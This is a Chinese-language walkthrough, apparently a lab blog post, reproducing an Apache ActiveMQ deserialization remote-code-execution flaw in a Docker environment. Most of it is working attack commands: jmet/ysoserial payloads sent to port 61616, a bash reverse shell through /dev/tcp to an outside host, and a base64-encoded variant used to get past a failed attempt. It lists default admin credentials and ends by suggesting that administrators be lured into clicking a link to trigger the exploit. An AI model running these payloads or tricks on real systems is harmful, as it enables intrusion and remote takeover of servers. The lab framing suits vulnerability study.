漏洞简介
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
漏洞环境
运行漏洞环境:
docker-compose up -d
环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。
访问:
http://192.168.84.201:8161
http://192.168.84.201:8161/admin
账号:admin
密码:admin
环境部署完毕。
漏洞复现:
1.漏洞利用过程如下:
a.构造(可以使用ysoserial)可执行命令的序列化对象
b.作为一个消息,发送给目标61616端口
c.访问的Web管理页面,读取消息,触发漏洞
2.使用jmet进行漏洞利用:
首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。
cd /opt
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external
使用win系统,下载就好。
3.执行命令
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.84.201 61616
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /root/sucess" -Yp ROME 192.168.84.201 61616
报错:
创建external文件夹,再次执行:
4.此时会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://192.168.84.201:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:
5.点击查看这条消息即可触发命令执行
6.此时进入容器
docker ps //查看容器id
docker exec -it b4edc08e3122 /bin/bash //进入容器
或者:
docker-compose exec activemq bash //进入容器
7.可看到/ tmp /已成功创建,说明漏洞利用成功:
8.反弹shell:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/192.168.84.197/2233>&1" -Yp ROME 192.168.84.201 61616
反弹shell失败:
编码,绕过:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaT4vZGV2L3RjcC8xOTIuMTY4Ljg0LjE5Ny81NTIyIDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.84.201 61616
反弹shell成功:
值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。
还有一种添加用户,ssh连接的方式,百度一下吧。个人认为反弹shell已经足够。
618
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
